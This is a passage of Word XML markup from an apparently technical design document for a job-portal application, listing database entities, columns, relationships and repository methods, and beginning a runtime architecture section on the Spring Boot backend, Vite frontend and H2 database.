            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CompanyRepository: findByVerifiedTrue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: name (VARCHAR, UNIQUE, NOT NULL), slug (VARCHAR, UNIQUE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToMany(Job)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CategoryRepository: findBySlug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: job_id (BIGINT, FK), candidate_id (BIGINT, FK), status (ENUM: APPLIED..HIRED), appliedAt (TIMESTAMP), coverLetter (TEXT) [UNIQUE KEY (job_id, candidate_id)]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne(Job), ManyToOne(User/Candidate), OneToMany(Interview), OneToOne(Offer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicationRepository: existsByJobAndCandidate, findByCandidate, findByJobAndStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Interview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>interviews</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: application_id (BIGINT, FK), interviewer_id (BIGINT, FK), roundName (VARCHAR), scheduledAt (TIMESTAMP), meetingUrl (VARCHAR), feedback (TEXT), passed (BOOLEAN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne(Application), ManyToOne(User/Interviewer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>InterviewRepository: findByApplication, findUpcomingInterviews</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Offer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>offers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: application_id (BIGINT, FK, UNIQUE), baseSalary (DECIMAL), joiningDate (DATE), terms (TEXT), status (ENUM: EXTENDED, ACCEPTED, DECLINED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToOne(Application)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OfferRepository: findByApplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RecruiterRequest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>recruiter_requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: user_id (BIGINT, FK), companyName (VARCHAR), companyWebsite (VARCHAR), status (ENUM: PENDING, APPROVED, REJECTED), requestedAt (TIMESTAMP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne(User)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RecruiterRequestRepository: findByStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: user_id (BIGINT, FK), title (VARCHAR), message (TEXT), read (BOOLEAN), createdAt (TIMESTAMP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne(User)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NotificationRepository: findByUserOrderByCreatedAtDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AuditLog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>audit_logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: action (VARCHAR), performedBy (VARCHAR), clientIp (VARCHAR), details (TEXT), timestamp (TIMESTAMP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None (Decoupled append-only audit trail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AuditLogRepository: findAllByOrderByTimestampDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>19. Runtime Analysis &amp; System Telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The GlobalCo application operates as two decoupled processes communicating over loopback HTTP network interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Backend Process: Spring Boot 3.2.3 executing on Java 21 LTS runtime. Listens on TCP port 8080. Embedded Tomcat server handles worker thread pooling (default 200 max threads).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Frontend Process: Vite 7 development server executing on Node.js v24. Listens on TCP port 5173 with active WebSocket connection for Hot Module Replacement (HMR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Database Engine: H2 In-Memory Relational Engine executing inside the backend JVM. Configured with DB_CLOSE_DELAY=-1 to preserve schema and pre-seeded data across thread terminations.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2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Process / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Default Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Active Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Memory Footprint</w:t>
            </w:r>
